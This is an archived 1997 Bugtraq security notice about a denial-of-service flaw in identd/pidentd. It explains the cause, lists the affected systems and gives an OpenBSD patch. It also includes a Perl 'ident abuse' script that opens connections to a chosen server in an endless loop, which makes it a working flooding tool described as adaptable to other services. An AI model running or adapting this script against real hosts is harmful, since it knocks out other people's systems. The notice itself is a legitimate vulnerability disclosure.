Bugtraq mailing list archives
CPSR #8: identd Denial of Service
From: releases () CORINNE MAC EDU (Corinne Posse Releases)
Date: Mon, 4 Aug 1997 09:19:54 -0500
************** Corinne Posse Security Notice ************** Issue Number 8: 970803 ************** http://posse.cpio.org ************** **** Denial of Service care of identd **** A massive amount of authorization requests to identd (pidentd and others) can cause system load to skyrocket, making the system unusable. Affected Sites: FreeBSD, NetBSD, Linux, SCO, Solaris, IRIX, and OpenBSD prior to 8/1/97. ANY system running pidentd. Problem: A massive amount of ident requests causes the identd daemon to "spin" because the daemon does not correctly close the socket from the host that issues a request. This is due to a poorly implemented incantation of wait(). The improper code perpetuates the identd process and allows the process to hang, slowing system performance considerably. On average, 2-3 spinning processes slow the system noticeably-- 10-15 make the system unusable. Bear in mind that this is all based on the speed of the system and the above numbers hold true for machines like a p5/100 with 32M of RAM. Simply "kill -9 (ident's PIDs)" fixes the problem if it occurs. Fix: Thanks to Theo de Raadt of the OpenBSD project, we are proud to announce that OpenBSD has fixed this problem, and that the following patches are available. OpenBSD uses a modified version of pidentd. Index: libexec/identd/identd.c =================================================================== RCS file: /cvs/src/libexec/identd/identd.c,v retrieving revision 1.4 retrieving revision 1.5 diff -r1.4 -r1.5 2c2 < ** $Id: identd.c,v 1.4 1997/07/23 20:36:27 kstailey Exp $ ---
** $Id: identd.c,v 1.5 1997/07/29 07:49:31 deraadt Exp $
180a181
int save_errno = errno;
184a186
errno = save_errno;
Exploit: This problem was discovered simultaneously by Jack0 as well as Jonathan Katz. Jack0 noticed that a user's repeated requests to an IRC server spawned many identd processes on his local machine, bringing his box to a crawl. Jon noticed that after someone sent email to the various mailing lists he runs, the many hosts receiving the mail would make ident requests and leave his system paralyzed. To see if your system is vulnerable, Jack0 has come up with a PERL script that repeatedly tries to connect to an IRC server. With a little tinkering, the script can be used to adapt to a variety of different services if you want or need to test other services. #!/usr/bin/perl # Ident abuse script which can be used to test for the identd vulnerability # on the local system. # jack0 () cpio org for questions #include <Socket.pm> use Socket; my($h,$p,$in_addr,$proto,$addr); $h = "$ARGV[0]"; $p = 6667 if (!$ARGV[1]); if (!$h) { print "Host name most be specified i.e.,; some.server.net\n"; } $in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr); $proto = getprotobyname('tcp'); &connect; sub connect { print "Connection in progress:\n"; socket(S, AF_INET, SOCK_STREAM, $proto) or die $!; connect(S,$addr) or die $!; select S; $| = 1; print "QUIT\n"; select STDOUT; close S; &connect; } Concept by: Jack0 (jack0 () cpio org) and Jonathan Katz (jkatz () cpio org) Special Thanks To: Theo de Raadt
Current thread:
- Re: Small problem in AIX write command: Executes shell David Hedley (Aug 01)
- <Possible follow-ups>
- Small problem in AIX write command: Executes shell DI. Dr. Klaus Kusche (Aug 01)
- Re: Small problem in AIX write command: Executes shell David Holland (Aug 01)
- comp.sys.sgi.bugs: YET another security alert (sigh) Arthur Hagen (Aug 04)
- comp.sys.sgi.bugs: Re: YET another security alert (sigh) Forwarded by Kari Hurtta (Aug 05)
- CPSR #8: identd Denial of Service Corinne Posse Releases (Aug 04)
- Re: CPSR #8: identd Denial of Service Curt Sampson (Aug 04)
- Re: Small problem in AIX write command: Executes shell David Holland (Aug 01)
- INND causes cancer in laboratory rats (fwd) Dan Fleisher (Aug 01)
- Re: INND causes cancer in laboratory rats (fwd) thoth () PURPLEFROG COM (Aug 01)
- Bugs in Debian Linux's ircd package Matt (Aug 01)
- SSH LocalForward Kristof Van Damme (Aug 02)
- Security hole in rusers client David Holland (Aug 02)
- SSH LocalForward Nicolas Dubee (Aug 02)
- Re: your mail Erik Troan (Aug 10)
- Sun Security Bulletin #00149 Aleph One (Aug 13)
- Sun Security Bulletin #00150 Aleph One (Aug 13)